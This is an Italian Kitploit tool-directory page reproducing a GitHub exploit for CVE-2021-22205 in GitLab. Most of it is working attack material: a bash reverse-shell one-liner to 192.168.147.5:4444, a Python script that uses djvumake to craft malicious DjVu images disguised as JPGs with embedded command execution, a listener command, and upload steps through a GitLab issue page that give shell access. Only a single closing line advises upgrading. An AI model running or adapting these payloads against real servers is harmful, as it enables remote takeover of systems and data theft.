Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-22205-getshell — CVE-2021-22205-getshell | Kitploit
Strumenti/GitHubGitHub/shang159/cve-2021-22205-getshell
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubshang159/cve-2021-22205-getshell

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Vedi Repository
314 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Versione di test

Costruzione del comando per generare lo sfruttamento

root@kitploit:~
echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh
chmod +x /tmp/1.sh
/bin/bash /tmp/1.sh

Utilizzo di djvumake per generare l'immagine di sfruttamento

root@kitploit:~
import os
payloads=[
    "echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh",
    "chmod +x /tmp/1.sh",
    "/bin/bash /tmp/1.sh",
]
index=1000
for payload in payloads:
    rce_payload = '(metadata\n\t(Copyright "\\\n" . qx{{{0}}} . \\\n" b ") )\n'.format(payload).encode()
    with open("rce-{0}.txt".format(index), "wb") as text_file:
        text_file.write(rce_payload)
    text_file.close()
    os.system("./djvumake rce-{0}.djvu INFO=0,0 BGjp=/dev/null ANTa=rce-{1}.txt && mv rce-{2}.djvu rce-{3}.jpg".format(index,index,index,index))
    index=index+1
Scarica lo strumento

Ascolto locale sulla porta 4444 in attesa della shell inversa

root@kitploit:~
nv -lv 192.168.147.5 4444

Caricamento delle immagini su Gitlab

  • Qui c'è una differenza rispetto agli exp trovati online: molti exp per vulnerabilità usano Gitlab di versione alta, probabilmente 12 o 13, e il punto di caricamento è la sezione "Nuovo snippet", con percorso: /uploads/user
  • La versione che ho verificato io è la 11.10.0; usando il percorso di caricamento pubblico /uploads/user, restituisce 404; usando il percorso di caricamento degli snippet /uploads/personal_snippet, non riesce a eseguire il comando
  • Alla fine, caricando l'immagine dalla pagina di creazione di una issue, si riesce a eseguire il comando

Ottenimento dei permessi della macchina target tramite shell inversa

Dopo aver caricato le tre immagini, la terza esegue il comando di shell inversa, ottenendo con successo i permessi della macchina target

Raccomandazioni per la correzione

Aggiornare Gitlab il prima possibile all'ultima versione di sicurezza.